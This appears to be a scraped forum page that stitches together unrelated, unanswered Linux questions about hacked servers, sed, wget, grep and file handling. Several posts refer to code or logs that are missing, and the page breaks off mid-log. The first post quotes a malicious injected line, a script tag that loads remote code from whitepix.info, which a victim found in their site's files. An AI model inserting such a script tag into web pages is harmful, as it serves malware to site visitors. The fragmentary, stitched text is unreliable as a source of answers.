Security :: Site Hacked - Deleting Specific Line From Files Recursively?
Apr 26, 2011
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
I've discovered that after restoring my site's backup this has happened to me again. How to delete the hacked /home/crocbits directory so that I can restore the backup under the same username. When I try to delete /home/crocbits I get this message when logged in as root:
and this is the code of text file. and the second question when i use "/$name/ d" it deletes not only the names which are macthing with $name but also all words that contain $name. so how can i fix these problems_?
I would like to overwrite files in a directory tree, recursively. The ones I would like to overwrite match the filename "x_alpha*.png" and have a size exactly 456 bytes. Is there any way to search for these recursively in a directory tree, and overwrite them with a reference file, for example "e:mydirgood.png"
I am using Windows 7, but I have UnxUtils, so I can use those too. What I am looking for is something like this, generated automatically: copy /y e:mydirgood.png e:mydiracx_alpha0023.png copy /y e:mydirgood.png e:mydirefgx_alpha0045.png copy /y e:mydirgood.png e:mydirhx_alpha0248.png
suppose in my current directory, I have 50 sub-directories. Now, I am interested only in about 20 of those sub-directories (whose names match a pattern). I would like to recursively list the contents of these 20 sub-directories. How do I do that ? I would like to do this in Solaris 10 and Linux(RHEL 5.x).
However, even though page1.html contains hundreds of links to subpages, which themselves have direct links to images, wget reports things like "Removing subpage13.html since it should be rejected", and never downloads any images, since none are directly linked to from the starting page.I'm assuming this is because my --accept is being used to both direct the crawl and filter content to download, whereas I want it used only to direct the download of content. How can I make wget crawl all links, but only download files with certain extensions like *.jpeg?
EDIT: Also, some pages are dynamic, and are generated via a CGI script (e.g. img.cgi?fo9s0f989wefw90e). Even if I add cgi to my accept list (e.g. --accept=jpg,jpeg,html,cgi) these still always get rejected. Is there a way around this?
I have two files, file1.traj and file2.traj. Both these files contain identical data and the data are arranged in same format in them. The first line of both files is a comment.
At line 7843 of both files there is a cartesian coordinate X, Y and Z ( three digits ). And at line 15685 there is another three digits. The number of lines in between two cartesian coordinates are 7841. And there are few hundreds of thousands of lines in a file.
What I need to do is copy the X Y Z coordinate (three digits) from file1.traj at line 7843 and paste into file2.traj at the same line number as in file1.traj. The next line will be 15685 from file1.traj and replace at line 15685 at file2.traj. And I dont want other lines (data) in file2.traj get altered. This sequence shall be going on until the end of the file. Means copy and substitude the selected lines from file1.traj into file2.traj.
I tried to use paste command but I cant do for specified line alone.
Here i showed the data format in the file. I used the line number for clarity purpose.
I'm using bash under Ubuntu.Currently this works well for the current directory:catdoc *.doc | grep "specificword" But I have lots of subdirectories with .doc files.How can I search for, let's say, "specificword" recursively?
I want to know if any one hacked or getting into my computer. I am using lucidlynx right now, My computer directly connected to modem, not using any wireless router. How can i check if some one hacked? How to prevent it?
I have a 6yo laptop...z60m. Solid little thing that I knocked around so much the hinge broke. My dad jerryrigged it so it can stay open.
So now I use it as a glorified DVD player. Then, around February the hard drive died. I put it in fresh, loaded a couple of regular games and the DVD modifications to play DVD's. So, besides the basic upgrade to 9.1 not much as been done.
Well, last week my panel disappeared. I procrastinated and last night I got on the computer. I did F2 and "xfce-panel" and my panel reappeared exactly how I'd last tweaked it.
With on exception. This blue globe, "Akonadi" had mysteriously appeared.
Thing is that I haven't installed or updated anything for 8 months...why? becuase I haven't had this thing connected to the Internet. The wireless tower has been on. (my bad) but all of the signigals in my neck of the wood are encripted so I just let it be.
I don't know where this program came from. Is it loaded in xubuntu? Why would it show up? And furthermore if there was someone with malicious intent (unfortunatly I do have to take that into consideration) have put this on for data collection?
Awoke to millions of failed SSH attempts into my public server. Behind a firewall which forwards only SSH and HTTP. Local iptables deny everything except SSH and HTTP. Exact same symptoms and results as Chris over at his site: here.I just want to know how they managed to execute a script, or make changes etc? Here's some info:According to cat /var/log/secure | grep "Accepted" no one besides myself gained entry via SSH.The FTP account (500:48 (Purposely in apache group)) is chrooted to a 775 directory and vsftpd does not accept anonymous entry. vsftpd and xferlog's are empty?
Code: You have new mail in /var/spool/mail/root [root@dev etc]# tail /var/spool/mail/root
I had a serious breach of the cellular segment of my communications network this week. All I can say is nobody got hurt. The attackers also knew where to find me via email. I'm concerned that perhaps they've penetrated this aspect of my system as well, although they seemed pretty specifically focused on the phone. There have been no changes on anything on my computer, and of course, I went ahead and changed all the passwords. How can I verify or at least look into the possibility of having been hacked as well.
my computer has been surely hacked for at least more than two months; my private information are being hacked and spread around! I initally used Windows Vista and I had the firewall off and no antivirus software. When I realized that my OS had been hacked, I began turning my firewall on and installing security softwares, but nothing stopped the hack.
Yesterday, I erased all my partitions and installed Ubuntu 10.10. I installed rkhunter and a firewall. I changed my static IP adress, at least for the sake of knowledge, to another one, then I got disconnected since my router only allows my old IP.
When I'm about to write my admin password, I disconnect from the network. I've scanned my system using rkhunter, and the result is a list of 30 suspicious files!
Can I adjust my router in a way that it can allow any IP adress? If yes, can I have a non-static IP adress? How to prevent the hacking in the first place? However, I believe, I don't know yet, that my Ubuntu has also been hacked...
If I can't get rid of the hacker(s), then I should permanently disconnect from internet and find another way to receive information anonymously through the internet.
I have LAN with 20 machines. I see that one of them is infected. Its sending a lot of packets to the internet. My internet connection at this momment is realy slow. What should I do? How to detect which machine is infected? I'm using hardware firewall. Fortigate... Its hard to configure there nice logs. Any good software. I don't want to switch off network cable from each machine and check.
The server was hacked from so called Tor IP address. I am tiref of worrying about server security and now have an idea to get a static IP address from my ISP and to allow logins only from this IP address. What do you think about it? This idea looks good for me but are there any risks to lose access to the server. Can ISP provider change the static IP address for some reason?
A scan on my computer reported as up many local ips which simply does not exist in my network. This host is supposed to have ip 192.168.0.4, but all other ip should not be there. I have a USB modem connected to a Linux box, connected itselfs to a wifi linksys router and thats it.
# nmap -sP '192.168.*.*' | grep -v down Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2010-11-18 21:46 CET Host 192.168.0.4 appears to be up. Host 192.168.7.27 appears to be up. Host 192.168.10.0 appears to be up.
I believe it is a keylogger because my Facebook account has been hacked, I believe my email has as well. I heard that even if you reformat a harddrive, the virus could still sit there and apparently that is what happened to me. how to be rid of it and keep my security. I installed RKhunter and Chkrootkit. Rkhunter reports warning files while checking my filesystem. I can post a log if need be.
My server (Ubuntu 10.04 desktop) was hacked. I had my ethernet plugged in to an Intel 82557 Ethernet Pro card (Pulse) when my server was first attacked. After it was attacked I reinstalled the system but my ethernet card still would not work. Ubuntu recognized it, but it is continually disconnected and the little status lights on the card do not light up anymore.
So then I plugged the ethernet to the mother board itself. Well, my server was hacked again and now the ethernet on the motherboard does not work. Again, Ubuntu (after a reinstall) recognizes the hardware but nothing happens when I plug the etherent in. The motherboard is a BioStar P4M900 VIA chipset. I have a few of the system logs here [URL] which I saved right after the first attack.
I just got control over a server that was hacked several months back. The other day we started receiving rejected emails sent from my server to a yahoo email address that is no longer active that contained users login information. I am trying to find the process that is sending these emails. So far its been like finding a needle in a haystack. The email that is being sent is appending the login information each time it is sent so there must be a local file that contains this information. I have tried using grep and find without any luck.
My server is probaly hacked and sending spam emails. I see them randomly in maillog (/usr/local/psa/var/log/maillog, server has a plesk panel), sometimes a few in a long time, sometimes a lot of them.Here is a sample of it:
Jan 4 00:47:08 acv360 qmail-remote-handlers: Handlers Filter before-remote for qmail started ... Jan 4 00:47:08 acv360 qmail-remote-handlers: email@example.com